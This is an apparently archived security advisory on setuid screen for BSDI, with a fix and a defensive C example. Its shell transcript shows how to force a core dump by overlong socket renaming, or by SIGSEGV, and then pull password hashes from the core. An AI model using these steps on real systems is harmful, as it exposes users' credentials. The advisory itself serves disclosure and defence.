COMMAND

    /usr/contrib/bin/screen

SYSTEMS AFFECTED

    BSDI

PROBLEM

    Khelbin Sunvold <khelbin@CONNIX.COM> posted the following. The program
    in question is /usr/contrib/bin/screen (BSDI). This is screen version
    3.05.02 and it is installed setuid root, as it is "supposed" to be.
    Here is a demonstration:

        $ screen

        Screen version 3.05.02 (FAU) 19-Aug-93

        Copyright (c) 1993 Juergen Weigert, Michael Schroeder
        Copyright (c) 1987 Oliver Laumann

        [snip boring messages]

        [Press Space or Return to end.]

        $ screen

        $ cd /tmp/screens/S-khelbin
        $ ls
        246.ttyp7.comet
        $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
        > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
        $ screen -ls
        /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
        %1     278 Abort - core dumped  screen -ls
        $ ls -l
        total 176
        srwx------  1 khelbin  khelbin       0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
        -rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
        $ strings core.screen|less

    The core.screen file contains unencrypted password strings from
    /etc/master.passwd, which, of course, should not be readable by an
    ordinary user.

    Brett Miller found the same bug in version 3.07.01 running on BSDI 2.1
    and has successfully tested it by running screen, suspending it with
    ^Z, and killing the process with signal 11 (SIGSEGV). When an attempt
    is made to re-enter the process with fg, it dumps core. Running
    strings on the core file yields the unshadowed password fields, which
    can be reconstructed.

SOLUTION

    Run chmod -s /usr/contrib/bin/screen while the old version is in use.
    There were several buffer overflows in old versions of screen; the
    latest version is 3.7.2, available from

        ftp://prep.ai.mit.edu/pub/gnu/screen-3.7.2.tar.gz.

    The overflows have been fixed for a long time now, and I was unable to
    reproduce the core dump on Linux with screen 3.07.01. Anyway, with
    BSDI it seems to work.
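    The two defensive measures behind the PROBLEM and SOLUTION sections
    above, written out as an added example. This is not screen's own code
    and not the BSDI fix; it is an illustration of (1) rejecting a
    UNIX-domain socket name that does not fit in sun_path before it can
    reach connect() and trigger the "Invalid argument" abort seen in the
    transcript, and (2) a setuid program disabling core dumps before it
    reads anything from /etc/master.passwd and scrubbing the buffer
    afterwards, so a crash cannot write privileged data into a
    user-readable core file. The directory, socket name and "secret"
    buffer contents are constructed sample values.

```c
/* Added example (not screen's code): defensive handling of socket names
 * and secrets in a setuid program. All paths and values are constructed. */
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Build a sockaddr_un for "dir/name". Returns 0 on success, -1 if the
 * full path (with its terminating NUL) would not fit in sun_path. The
 * caller then reports an error instead of calling connect() with a
 * truncated or invalid address. */
int build_unix_addr(struct sockaddr_un *sa, const char *dir, const char *name)
{
    size_t need = strlen(dir) + 1 + strlen(name) + 1;  /* dir '/' name NUL */
    if (need > sizeof sa->sun_path)
        return -1;
    memset(sa, 0, sizeof *sa);
    sa->sun_family = AF_UNIX;
    snprintf(sa->sun_path, sizeof sa->sun_path, "%s/%s", dir, name);
    return 0;
}

/* Set this process's core-file size limit to zero (soft and hard), so a
 * later crash writes no core. Lowering the limit needs no privilege.
 * Returns 0 on success. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Current soft limit on core files; 0 means none will be written. */
long core_limit(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
    return (long)rl.rlim_cur;
}

/* Overwrite a buffer that held a secret. The volatile pointer keeps the
 * compiler from discarding the stores as dead code. */
void scrub(char *buf, size_t len)
{
    volatile char *p = (volatile char *)buf;
    while (len--)
        *p++ = 0;
}

/* 1 if every byte of buf is zero, else 0. */
int is_zeroed(const char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i])
            return 0;
    return 1;
}

int main(void)
{
    struct sockaddr_un sa;
    char longname[300];
    /* Constructed stand-in for a password field read while privileged. */
    char secret[64] = "constructed-example-field-not-a-real-hash";

    /* Do this before the privileged read, not after the crash. */
    disable_core_dumps();
    printf("core limit now: %ld\n", core_limit());

    if (build_unix_addr(&sa, "/tmp/screens/S-user", "246.ttyp7.comet") == 0)
        printf("accepted: %s\n", sa.sun_path);

    memset(longname, 'a', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    if (build_unix_addr(&sa, "/tmp/screens/S-user", longname) != 0)
        printf("rejected: socket name too long for sun_path\n");

    scrub(secret, sizeof secret);
    printf("secret scrubbed: %d\n", is_zeroed(secret, sizeof secret));
    return 0;
}
```

    The length check uses sizeof sun_path rather than a hard-coded number
    because the field is 104 bytes on BSD and 108 on Linux; the same
    overlong name the transcript shows would be refused here with a plain
    error return instead of an abort().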